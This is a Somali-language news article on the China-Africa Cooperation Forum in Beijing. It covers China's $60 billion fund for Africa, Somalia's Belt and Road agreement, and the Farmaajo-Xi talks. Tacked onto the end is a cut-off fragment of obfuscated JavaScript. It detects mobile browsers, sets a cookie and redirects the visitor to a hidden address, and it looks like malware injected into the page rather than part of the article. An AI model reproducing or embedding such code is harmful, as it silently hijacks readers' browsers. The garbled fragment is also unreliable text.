Waxaa shalay si rasmi ah magaalada Beijing uga furmay Madasha Iskaashiga Shiinaha iyo Afrika oo kulmisay 53 qaran oo Afrikaan ah, Qaramada Midoobey iyo Midowga Afrika.
Waddanka Shiinaha, oo ka duulaya xoojinta iskaashiga dhaqaale iyo xiriirka Shiinaha iyo Afrika ayaa waxa uu ku dhawaaqay Sanduuq horumarineed oo $60 bilyan ah kaasi oo ugutalagalay Afrika.
Sanduuqan oo loo qoondeeyey hindisayaasha horumarineed ee Afrika ayaa la filayaa in lagu fuliyo saddex sanno gudahood.
Soomaaliya ayaa dhawaan saxiixday Hindisaha Dhismaha Kaabeyaasha Dhaqaalaha (Belt and Road Initiative), hindisahaas oo fududeenaya isku xirnaanta dalalka iyo horumarka dhaqaale.
Badi hindisayaasha horumar ee sanduuqan ayaa waxa lagu salaynayaa mashaariicda qaybta ka ah Hindisaha Kaabayaasha Dhaqaale.
Qaybta horumarinta loogu talagalay ee sanduuqan waxaa kamid ah hindisayaasha isgaarsiinta, kaabayaasha dhaqaalaha, tamarta, dekadaha iyo tabobarrada.
Soomaaliya waxa ay sidoo kale saxiixday heshiis la xiriira sare u qaadidda Iskaashiga Dhaqaale iyo Farsamo ee u dhexeeya Beijing iyo Muqdisho.
Sanduuqan $60 bilyan ah waxa uu ka kooban yahay $15 bilyan oo dayn bilaa dulsaar ah, $15 bilyan kale oo deeq ah, $20 bilyan oo dayn ah, iyo 5 bilyan oo lagu taageerayo badeecadaha laga soo dhoofiyo Afrika.
Madaxweyne Maxamed Cabdullaahi Farmaajo iyo Madaxweyne Xi Jinging, wadahadalladii ay yeesheen ka hor intaanu dhicin shirka Madasha Iskaashiga Shiinaha iyo Afrika, waxa ay isla garteen in la xoojiyo xiriirrada dhaqaale iyo in la iska kaashado hindisayaasha horumarka.
Soomaaliya waxa ay dadaal ku bixinaysaa helidda maalgelin horumarineed iyo maalgashi shisheeye si ay u gaarto yoolalka horumarka, ugana faaa��iideysato halka ay kaga taallo Geeska Afrika oo ah meel Istiraatiiji ah.
Hadaba dawladda Faderaalka Ah Ee Soomaaliya Maxaa Kaga Aadan Sideesa Uga Faa’ideysan Kartaa deeqdaan Shiinuhu Ugu Deeqay Africa Waxaa Sharraxaya Maxamuud Aadan Xuseen Ganey Oo Ka Mid Ah Siyaasiyiinta Soomaaliyeed Ee Ku Sugan Dalka
-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

